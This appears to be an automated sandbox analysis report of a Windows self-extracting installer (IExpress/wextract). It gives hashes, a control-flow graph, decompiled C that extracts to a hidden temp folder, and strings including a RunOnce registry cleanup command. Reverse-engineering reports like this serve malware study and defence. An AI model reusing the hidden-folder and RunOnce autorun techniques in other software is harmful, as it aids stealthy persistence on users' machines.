                                                                                                                                                                                                                                            • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                            • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                                                                                                                                                                                                                                            • API String ID: 178549006-850274211
                                                                                                                                                                                                                                            • Opcode ID: 616e2d9b7a85b457e591f54584e91647883feb7ab18592a5ec689011f75906b1
                                                                                                                                                                                                                                            • Instruction ID: 696330c0c9ca48dda9dd37b199e190cc26ad47cc8291104e8ef98e9d91ddd2b1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 616e2d9b7a85b457e591f54584e91647883feb7ab18592a5ec689011f75906b1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6851E671A00234BBDB339B64EC49FEB776CEF55700F1081A8FA49E6151DA719D4A8A50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 232 3255a0-3255d9 call 32468f LocalAlloc 235 3255db-3255f1 call 3244b9 call 326285 232->235 236 3255fd-32560c call 32468f 232->236 250 3255f6-3255f8 235->250 242 325632-325643 lstrcmpA 236->242 243 32560e-325630 call 3244b9 LocalFree 236->243 246 325645 242->246 247 32564b-325659 LocalFree 242->247 243->250 246->247 248 325696-32569c 247->248 249 32565b-32565d 247->249 255 3256a2-3256a8 248->255 256 32589f-3258b5 call 326517 248->256 252 325669 249->252 253 32565f-325667 249->253 254 3258b7-3258c7 call 326ce0 250->254 257 32566b-32567a call 325467 252->257 253->252 253->257 255->256 260 3256ae-3256c1 GetTempPathA 255->260 256->254 269 325680-325691 call 3244b9 257->269 270 32589b-32589d 257->270 264 3256f3-325711 call 321781 260->264 265 3256c3-3256c9 call 325467 260->265 274 325717-325729 GetDriveTypeA 264->274 275 32586c-325890 GetWindowsDirectoryA call 32597d 264->275 272 3256ce-3256d0 265->272 269->250 270->254 272->270 276 3256d6-3256df call 322630 272->276 280 325730-325740 GetFileAttributesA 274->280 281 32572b-32572e 274->281 275->264 286 325896 275->286 276->264 287 3256e1-3256ed call 325467 276->287 284 325742-325745 280->284 285 32577e-32578f call 32597d 280->285 281->280 281->284 289 325747-32574f 284->289 290 32576b 284->290 297 3257b2-3257bf call 322630 285->297 298 325791-32579e call 322630 285->298 286->270 287->264 287->270 292 325771-325779 289->292 294 325751-325753 289->294 290->292 296 325864-325866 292->296 294->292 299 325755-325762 call 326952 294->299 296->274 296->275 306 3257d3-3257f8 call 32658a GetFileAttributesA 297->306 307 3257c1-3257cd GetWindowsDirectoryA 297->307 298->290 309 3257a0-3257b0 call 32597d 298->309 299->290 308 325764-325769 299->308 314 32580a 306->314 315 3257fa-325808 CreateDirectoryA 306->315 307->306 308->285 308->290 309->290 309->297 316 32580d-32580f 314->316 315->316 317 325811-325825 316->317 318 325827-32585c SetFileAttributesA call 321781 call 325467 316->318 317->296 318->270 323 32585e 318->323 323->296
                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                            			E003255A0(void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v265;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            				int _t32;
                                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                                            				int _t35;
                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                                            				int _t40;
                                                                                                                                                                                                                                            				int _t44;
                                                                                                                                                                                                                                            				long _t48;
                                                                                                                                                                                                                                            				int _t49;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            				int _t54;
                                                                                                                                                                                                                                            				int _t59;
                                                                                                                                                                                                                                            				char _t60;
                                                                                                                                                                                                                                            				int _t65;
                                                                                                                                                                                                                                            				char _t66;
                                                                                                                                                                                                                                            				int _t67;
                                                                                                                                                                                                                                            				int _t68;
                                                                                                                                                                                                                                            				int _t69;
                                                                                                                                                                                                                                            				int _t70;
                                                                                                                                                                                                                                            				int _t71;
                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                                                            				int _t73;
                                                                                                                                                                                                                                            				CHAR* _t82;
                                                                                                                                                                                                                                            				CHAR* _t88;
                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                            				signed int _t110;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t28 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                                                            				_t2 = E0032468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                                                            				if(_t109 != 0) {
                                                                                                                                                                                                                                            					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                                                            					_t32 = E0032468F(_t82, _t109, 1);
                                                                                                                                                                                                                                            					__eflags = _t32;
                                                                                                                                                                                                                                            					if(_t32 != 0) {
                                                                                                                                                                                                                                            						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                                                            						__eflags = _t33;
                                                                                                                                                                                                                                            						if(_t33 == 0) {
                                                                                                                                                                                                                                            							 *0x329a30 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						LocalFree(_t109);
                                                                                                                                                                                                                                            						_t35 =  *0x328b3e; // 0x0
                                                                                                                                                                                                                                            						__eflags = _t35;
                                                                                                                                                                                                                                            						if(_t35 == 0) {
                                                                                                                                                                                                                                            							__eflags =  *0x328a24; // 0x0
                                                                                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                                                                                            								L46:
                                                                                                                                                                                                                                            								_t101 = 0x7d2;
                                                                                                                                                                                                                                            								_t36 = E00326517(_t82, 0x7d2, 0, E00323210, 0, 0);
                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                            								_t38 =  ~( ~_t36);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								__eflags =  *0x329a30; // 0x0
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									goto L46;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t109 = 0x3291e4;
                                                                                                                                                                                                                                            									_t40 = GetTempPathA(0x104, 0x3291e4);
                                                                                                                                                                                                                                            									__eflags = _t40;
                                                                                                                                                                                                                                            									if(_t40 == 0) {
                                                                                                                                                                                                                                            										L19:
                                                                                                                                                                                                                                            										_push(_t82);
                                                                                                                                                                                                                                            										E00321781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                                                            										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                                                            										if(_v268 <= 0x5a) {
                                                                                                                                                                                                                                            											do {
                                                                                                                                                                                                                                            												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                                                            												__eflags = _t109 - 6;
                                                                                                                                                                                                                                            												if(_t109 == 6) {
                                                                                                                                                                                                                                            													L22:
                                                                                                                                                                                                                                            													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                                                            													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                                                            														goto L30;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L23;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													__eflags = _t109 - 3;
                                                                                                                                                                                                                                            													if(_t109 != 3) {
                                                                                                                                                                                                                                            														L23:
                                                                                                                                                                                                                                            														__eflags = _t109 - 2;
                                                                                                                                                                                                                                            														if(_t109 != 2) {
                                                                                                                                                                                                                                            															L28:
                                                                                                                                                                                                                                            															_t66 = _v268;
                                                                                                                                                                                                                                            															goto L29;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t66 = _v268;
                                                                                                                                                                                                                                            															__eflags = _t66 - 0x41;
                                                                                                                                                                                                                                            															if(_t66 == 0x41) {
                                                                                                                                                                                                                                            																L29:
                                                                                                                                                                                                                                            																_t60 = _t66 + 1;
                                                                                                                                                                                                                                            																_v268 = _t60;
                                                                                                                                                                                                                                            																goto L42;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																__eflags = _t66 - 0x42;
                                                                                                                                                                                                                                            																if(_t66 == 0x42) {
                                                                                                                                                                                                                                            																	goto L29;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t68 = E00326952( &_v268);
                                                                                                                                                                                                                                            																	__eflags = _t68;
                                                                                                                                                                                                                                            																	if(_t68 == 0) {
                                                                                                                                                                                                                                            																		goto L28;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                                                            																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                                                            																			L30:
                                                                                                                                                                                                                                            																			_push(0);
                                                                                                                                                                                                                                            																			_t103 = 3;
                                                                                                                                                                                                                                            																			_t49 = E0032597D( &_v268, _t103, 1);
                                                                                                                                                                                                                                            																			__eflags = _t49;
                                                                                                                                                                                                                                            																			if(_t49 != 0) {
                                                                                                                                                                                                                                            																				L33:
                                                                                                                                                                                                                                            																				_t50 = E00322630(0,  &_v268, 1);
                                                                                                                                                                                                                                            																				__eflags = _t50;
                                                                                                                                                                                                                                            																				if(_t50 != 0) {
                                                                                                                                                                                                                                            																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				_t88 =  &_v268;
                                                                                                                                                                                                                                            																				E0032658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                                                            																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                                                            																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                            																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                                                            																					__eflags = _t54;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				__eflags = _t54;
                                                                                                                                                                                                                                            																				if(_t54 != 0) {
                                                                                                                                                                                                                                            																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                                                            																					_push(_t88);
                                                                                                                                                                                                                                            																					_t109 = 0x3291e4;
                                                                                                                                                                                                                                            																					E00321781(0x3291e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                                                            																					_t101 = 1;
                                                                                                                                                                                                                                            																					_t59 = E00325467(0x3291e4, 1, 0);
                                                                                                                                                                                                                                            																					__eflags = _t59;
                                                                                                                                                                                                                                            																					if(_t59 != 0) {
                                                                                                                                                                                                                                            																						goto L45;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						_t60 = _v268;
                                                                                                                                                                                                                                            																						goto L42;
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t60 = _v268 + 1;
                                                                                                                                                                                                                                            																					_v265 = 0;
                                                                                                                                                                                                                                            																					_v268 = _t60;
                                                                                                                                                                                                                                            																					goto L42;
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				_t65 = E00322630(0,  &_v268, 1);
                                                                                                                                                                                                                                            																				__eflags = _t65;
                                                                                                                                                                                                                                            																				if(_t65 != 0) {
                                                                                                                                                                                                                                            																					goto L28;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t67 = E0032597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                                                            																					__eflags = _t67;
                                                                                                                                                                                                                                            																					if(_t67 == 0) {
                                                                                                                                                                                                                                            																						goto L28;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						goto L33;
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			goto L28;
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L22;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L47;
                                                                                                                                                                                                                                            												L42:
                                                                                                                                                                                                                                            												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                                                            											} while (_t60 <= 0x5a);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										goto L43;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t101 = 1;
                                                                                                                                                                                                                                            										_t69 = E00325467(0x3291e4, 1, 3); // executed
                                                                                                                                                                                                                                            										__eflags = _t69;
                                                                                                                                                                                                                                            										if(_t69 != 0) {
                                                                                                                                                                                                                                            											goto L45;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t82 = 0x3291e4;
                                                                                                                                                                                                                                            											_t70 = E00322630(0, 0x3291e4, 1);
                                                                                                                                                                                                                                            											__eflags = _t70;
                                                                                                                                                                                                                                            											if(_t70 != 0) {
                                                                                                                                                                                                                                            												goto L19;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t101 = 1;
                                                                                                                                                                                                                                            												_t82 = 0x3291e4;
                                                                                                                                                                                                                                            												_t71 = E00325467(0x3291e4, 1, 1);
                                                                                                                                                                                                                                            												__eflags = _t71;
                                                                                                                                                                                                                                            												if(_t71 != 0) {
                                                                                                                                                                                                                                            													goto L45;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													do {
                                                                                                                                                                                                                                            														goto L19;
                                                                                                                                                                                                                                            														L43:
                                                                                                                                                                                                                                            														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                            														_push(4);
                                                                                                                                                                                                                                            														_t101 = 3;
                                                                                                                                                                                                                                            														_t82 =  &_v268;
                                                                                                                                                                                                                                            														_t44 = E0032597D(_t82, _t101, 1);
                                                                                                                                                                                                                                            														__eflags = _t44;
                                                                                                                                                                                                                                            													} while (_t44 != 0);
                                                                                                                                                                                                                                            													goto L2;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                                                            							if(_t35 != 0x5c) {
                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                            								_t72 = 1;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								__eflags =  *0x328b3f - _t35; // 0x0
                                                                                                                                                                                                                                            								_t72 = 0;
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									goto L10;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t101 = 0;
                                                                                                                                                                                                                                            							_t73 = E00325467(0x328b3e, 0, _t72);
                                                                                                                                                                                                                                            							__eflags = _t73;
                                                                                                                                                                                                                                            							if(_t73 != 0) {
                                                                                                                                                                                                                                            								L45:
                                                                                                                                                                                                                                            								_t38 = 1;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t101 = 0x4be;
                                                                                                                                                                                                                                            								E003244B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            								goto L2;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t101 = 0x4b1;
                                                                                                                                                                                                                                            						E003244B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						LocalFree(_t109);
                                                                                                                                                                                                                                            						 *0x329124 = 0x80070714;
                                                                                                                                                                                                                                            						goto L2;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t101 = 0x4b5;
                                                                                                                                                                                                                                            					E003244B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					 *0x329124 = E00326285();
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					_t38 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L47:
                                                                                                                                                                                                                                            				return E00326CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                                                            			}





































                                                                                                                                                                                                                                            0x003255ab
                                                                                                                                                                                                                                            0x003255b2
                                                                                                                                                                                                                                            0x003255c9
                                                                                                                                                                                                                                            0x003255d5
                                                                                                                                                                                                                                            0x003255d9
                                                                                                                                                                                                                                            0x00325600
                                                                                                                                                                                                                                            0x00325605
                                                                                                                                                                                                                                            0x0032560a
                                                                                                                                                                                                                                            0x0032560c
                                                                                                                                                                                                                                            0x00325638
                                                                                                                                                                                                                                            0x00325641
                                                                                                                                                                                                                                            0x00325643
                                                                                                                                                                                                                                            0x00325645
                                                                                                                                                                                                                                            0x00325645
                                                                                                                                                                                                                                            0x0032564c
                                                                                                                                                                                                                                            0x00325652
                                                                                                                                                                                                                                            0x00325657
                                                                                                                                                                                                                                            0x00325659
                                                                                                                                                                                                                                            0x00325696
                                                                                                                                                                                                                                            0x0032569c
                                                                                                                                                                                                                                            0x0032589f
                                                                                                                                                                                                                                            0x003258a7
                                                                                                                                                                                                                                            0x003258ac
                                                                                                                                                                                                                                            0x003258b3
                                                                                                                                                                                                                                            0x003258b5
                                                                                                                                                                                                                                            0x003256a2
                                                                                                                                                                                                                                            0x003256a2
                                                                                                                                                                                                                                            0x003256a8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003256ae
                                                                                                                                                                                                                                            0x003256ae
                                                                                                                                                                                                                                            0x003256b9
                                                                                                                                                                                                                                            0x003256bf
                                                                                                                                                                                                                                            0x003256c1
                                                                                                                                                                                                                                            0x003256f3
                                                                                                                                                                                                                                            0x003256f3
                                                                                                                                                                                                                                            0x00325705
                                                                                                                                                                                                                                            0x0032570a
                                                                                                                                                                                                                                            0x00325711
                                                                                                                                                                                                                                            0x00325717
                                                                                                                                                                                                                                            0x00325724
                                                                                                                                                                                                                                            0x00325726
                                                                                                                                                                                                                                            0x00325729
                                                                                                                                                                                                                                            0x00325730
                                                                                                                                                                                                                                            0x00325737
                                                                                                                                                                                                                                            0x0032573d
                                                                                                                                                                                                                                            0x00325740
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032572b
                                                                                                                                                                                                                                            0x0032572b
                                                                                                                                                                                                                                            0x0032572e
                                                                                                                                                                                                                                            0x00325742
                                                                                                                                                                                                                                            0x00325742
                                                                                                                                                                                                                                            0x00325745
                                                                                                                                                                                                                                            0x0032576b
                                                                                                                                                                                                                                            0x0032576b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325747
                                                                                                                                                                                                                                            0x00325747
                                                                                                                                                                                                                                            0x0032574d
                                                                                                                                                                                                                                            0x0032574f
                                                                                                                                                                                                                                            0x00325771
                                                                                                                                                                                                                                            0x00325771
                                                                                                                                                                                                                                            0x00325773
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325751
                                                                                                                                                                                                                                            0x00325751
                                                                                                                                                                                                                                            0x00325753
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325755
                                                                                                                                                                                                                                            0x0032575b
                                                                                                                                                                                                                                            0x00325760
                                                                                                                                                                                                                                            0x00325762
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325764
                                                                                                                                                                                                                                            0x00325764
                                                                                                                                                                                                                                            0x00325769
                                                                                                                                                                                                                                            0x0032577e
                                                                                                                                                                                                                                            0x0032577e
                                                                                                                                                                                                                                            0x00325781
                                                                                                                                                                                                                                            0x00325788
                                                                                                                                                                                                                                            0x0032578d
                                                                                                                                                                                                                                            0x0032578f
                                                                                                                                                                                                                                            0x003257b2
                                                                                                                                                                                                                                            0x003257b8
                                                                                                                                                                                                                                            0x003257bd
                                                                                                                                                                                                                                            0x003257bf
                                                                                                                                                                                                                                            0x003257cd
                                                                                                                                                                                                                                            0x003257cd
                                                                                                                                                                                                                                            0x003257dd
                                                                                                                                                                                                                                            0x003257e3
                                                                                                                                                                                                                                            0x003257ef
                                                                                                                                                                                                                                            0x003257f5
                                                                                                                                                                                                                                            0x003257f8
                                                                                                                                                                                                                                            0x0032580a
                                                                                                                                                                                                                                            0x0032580a
                                                                                                                                                                                                                                            0x003257fa
                                                                                                                                                                                                                                            0x00325802
                                                                                                                                                                                                                                            0x00325802
                                                                                                                                                                                                                                            0x0032580d
                                                                                                                                                                                                                                            0x0032580f
                                                                                                                                                                                                                                            0x00325830
                                                                                                                                                                                                                                            0x00325836
                                                                                                                                                                                                                                            0x0032583d
                                                                                                                                                                                                                                            0x0032584b
                                                                                                                                                                                                                                            0x00325851
                                                                                                                                                                                                                                            0x00325855
                                                                                                                                                                                                                                            0x0032585a
                                                                                                                                                                                                                                            0x0032585c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032585e
                                                                                                                                                                                                                                            0x0032585e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032585e
                                                                                                                                                                                                                                            0x00325811
                                                                                                                                                                                                                                            0x00325817
                                                                                                                                                                                                                                            0x00325819
                                                                                                                                                                                                                                            0x0032581f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032581f
                                                                                                                                                                                                                                            0x00325791
                                                                                                                                                                                                                                            0x00325797
                                                                                                                                                                                                                                            0x0032579c
                                                                                                                                                                                                                                            0x0032579e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003257a0
                                                                                                                                                                                                                                            0x003257a9
                                                                                                                                                                                                                                            0x003257ae
                                                                                                                                                                                                                                            0x003257b0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003257b0
                                                                                                                                                                                                                                            0x0032579e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325769
                                                                                                                                                                                                                                            0x00325762
                                                                                                                                                                                                                                            0x00325753
                                                                                                                                                                                                                                            0x0032574f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032572e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325864
                                                                                                                                                                                                                                            0x00325864
                                                                                                                                                                                                                                            0x00325864
                                                                                                                                                                                                                                            0x00325717
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003256c3
                                                                                                                                                                                                                                            0x003256c5
                                                                                                                                                                                                                                            0x003256c9
                                                                                                                                                                                                                                            0x003256ce
                                                                                                                                                                                                                                            0x003256d0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003256d6
                                                                                                                                                                                                                                            0x003256d6
                                                                                                                                                                                                                                            0x003256d8
                                                                                                                                                                                                                                            0x003256dd
                                                                                                                                                                                                                                            0x003256df
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003256e1
                                                                                                                                                                                                                                            0x003256e2
                                                                                                                                                                                                                                            0x003256e4
                                                                                                                                                                                                                                            0x003256e6
                                                                                                                                                                                                                                            0x003256eb
                                                                                                                                                                                                                                            0x003256ed
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003256f3
                                                                                                                                                                                                                                            0x003256f3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032586c
                                                                                                                                                                                                                                            0x00325878
                                                                                                                                                                                                                                            0x0032587e
                                                                                                                                                                                                                                            0x00325882
                                                                                                                                                                                                                                            0x00325883
                                                                                                                                                                                                                                            0x00325889
                                                                                                                                                                                                                                            0x0032588e
                                                                                                                                                                                                                                            0x0032588e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325896
                                                                                                                                                                                                                                            0x003256ed
                                                                                                                                                                                                                                            0x003256df
                                                                                                                                                                                                                                            0x003256d0
                                                                                                                                                                                                                                            0x003256c1
                                                                                                                                                                                                                                            0x003256a8
                                                                                                                                                                                                                                            0x0032565b
                                                                                                                                                                                                                                            0x0032565b
                                                                                                                                                                                                                                            0x0032565d
                                                                                                                                                                                                                                            0x00325669
                                                                                                                                                                                                                                            0x00325669
                                                                                                                                                                                                                                            0x0032565f
                                                                                                                                                                                                                                            0x0032565f
                                                                                                                                                                                                                                            0x00325665
                                                                                                                                                                                                                                            0x00325667
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325667
                                                                                                                                                                                                                                            0x0032566c
                                                                                                                                                                                                                                            0x00325673
                                                                                                                                                                                                                                            0x00325678
                                                                                                                                                                                                                                            0x0032567a
                                                                                                                                                                                                                                            0x0032589b
                                                                                                                                                                                                                                            0x0032589b
                                                                                                                                                                                                                                            0x00325680
                                                                                                                                                                                                                                            0x00325685
                                                                                                                                                                                                                                            0x0032568c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032568c
                                                                                                                                                                                                                                            0x0032567a
                                                                                                                                                                                                                                            0x0032560e
                                                                                                                                                                                                                                            0x00325613
                                                                                                                                                                                                                                            0x0032561a
                                                                                                                                                                                                                                            0x00325620
                                                                                                                                                                                                                                            0x00325626
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325626
                                                                                                                                                                                                                                            0x003255db
                                                                                                                                                                                                                                            0x003255e0
                                                                                                                                                                                                                                            0x003255e7
                                                                                                                                                                                                                                            0x003255f1
                                                                                                                                                                                                                                            0x003255f6
                                                                                                                                                                                                                                            0x003255f6
                                                                                                                                                                                                                                            0x003255f6
                                                                                                                                                                                                                                            0x003258b7
                                                                                                                                                                                                                                            0x003258c7

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246A0
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: SizeofResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246A9
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246C3
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: LoadResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246CC
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: LockResource.KERNEL32(00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246D3
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: memcpy_s.MSVCRT ref: 003246E5
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003246EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 003255CF
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00325638
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0032564C
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00325620
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00324518
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00324554
                                                                                                                                                                                                                                              • Part of subcall function 00326285: GetLastError.KERNEL32(00325BBC), ref: 00326285
                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 003256B9
                                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0032571E
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00325737
